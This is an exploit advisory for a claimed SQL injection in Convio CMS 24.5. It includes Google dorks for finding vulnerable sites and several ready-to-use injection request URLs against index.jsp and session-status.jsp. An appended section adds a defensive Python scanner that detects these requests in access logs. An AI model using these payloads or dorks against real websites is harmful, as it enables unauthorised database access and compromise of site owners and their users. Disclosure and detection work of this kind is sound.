/*!
- # VULNERABILITY: Convio CMS version 24.5 SQL injection vulnerabilities (works on all version 24 releases)
- # Authenticated Persistent SQL injection
- # GOOGLE DORK: site:.com /about/news/index.jsp?page=2
- # GOOGLE DORK: site:.il /about/news/index.jsp?page=2
- # DATE: November 2024
- # SECURITY RESEARCHER: E1.Coders
- # VENDOR: Convio CMS [http://www.convio.com]
- # SOFTWARE LINK: http://www.convio.com/
- # CVE: CVE-2024-9986
- # CWE: CWE-89
*/
### -- [ Info: ]
[i] A valid persistent SQL injection vulnerability was discovered in an installed Convio version 24.5 website.
[i] Vulnerable parameter(s): - inurl:.com /about/news/index.jsp?page=2
### -- [ Impact: ]
[~] An attacker can inject malicious SQL code and combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
### -- [ Details: ]
[~] The vulnerable files are "index.jsp" and "session-status.jsp".
### -- [ EXPLOIT : ]
https://www.TARGET.com/about/news/index.jsp?page=2{sql inject code}
https://www.TARGET.com/about/news/index.jsp?page=2 RLIKE (case when 7273121=7273121 then 0x74657374696E70757476616C7565 else 0x28 end)
https://www.TARGET.com/system/auth/session-status.jsp?nocache=99999999/**/oR/**/5563379=5563379--
https://www.TARGET.com/system/auth/session-status.jsp?nocache=1715702042268%27/**/RLIKE/**/(case/**/when/**//**/4007635=4007635/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'='
https://www.TARGET.com/search/?q=<XSS SCRIPT BYPASS>
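For defenders, the two SQL injection requests above can be found in web server access logs by checking whether `page` and `nocache` carry anything other than digits. This is an added example, not part of the original advisory: the function names, the combined log format and the assumption that both parameters are purely numeric are mine, and the log lines are constructed from the request strings shown above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: both parameters are meant to carry only decimal digits,
# as in the benign forms page=2 and nocache=99999999 shown above.
NUMERIC_PARAMS = {
    "/about/news/index.jsp": "page",
    "/system/auth/session-status.jsp": "nocache",
}
DIGITS = re.compile(r"[0-9]{1,20}")
# Request target of a combined-format access log line ("GET <target> HTTP/1.1").
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

SAMPLE_LOG = [  # constructed lines; 192.0.2.0/24 is a documentation range
    '192.0.2.10 - - [01/Nov/2024:10:00:00 +0000] "GET /about/news/index.jsp?page=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Nov/2024:10:00:05 +0000] "GET /system/auth/session-status.jsp?nocache=99999999/**/oR/**/5563379=5563379-- HTTP/1.1" 200 312',
    '192.0.2.44 - - [01/Nov/2024:10:00:09 +0000] "GET /about/news/index.jsp?page=2%20RLIKE%20(case%20when%207273121=7273121%20then%200x74657374696E70757476616C7565%20else%200x28%20end) HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Nov/2024:10:00:12 +0000] "GET /system/auth/session-status.jsp?nocache=1715702042268 HTTP/1.1" 200 312',
]


def check_target(target):
    """Return (param, decoded_value) if a watched parameter is non-numeric, else None."""
    parts = urlsplit(target)
    # Servlet containers accept path parameters (;jsessionid=...); drop them first.
    path = parts.path.split(";", 1)[0]
    param = NUMERIC_PARAMS.get(path)
    if param is None:
        return None
    # parse_qsl percent-decodes, so %27 and %20 are compared as ' and space.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == param and not DIGITS.fullmatch(value):
            return (param, value)
    return None


def scan(lines):
    """Yield (line_number, param, value) for each request with a non-numeric value."""
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        hit = check_target(m.group(1)) if m else None
        if hit:
            yield (n, *hit)
```

The same digits-only allow-list, enforced in front of the application, rejects these requests until the vendor fix is installed.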
### -- [ Contacts: ]
[+] E-Mail: E1.Coders@Mail.Ru
[+] GitHub: @e1coders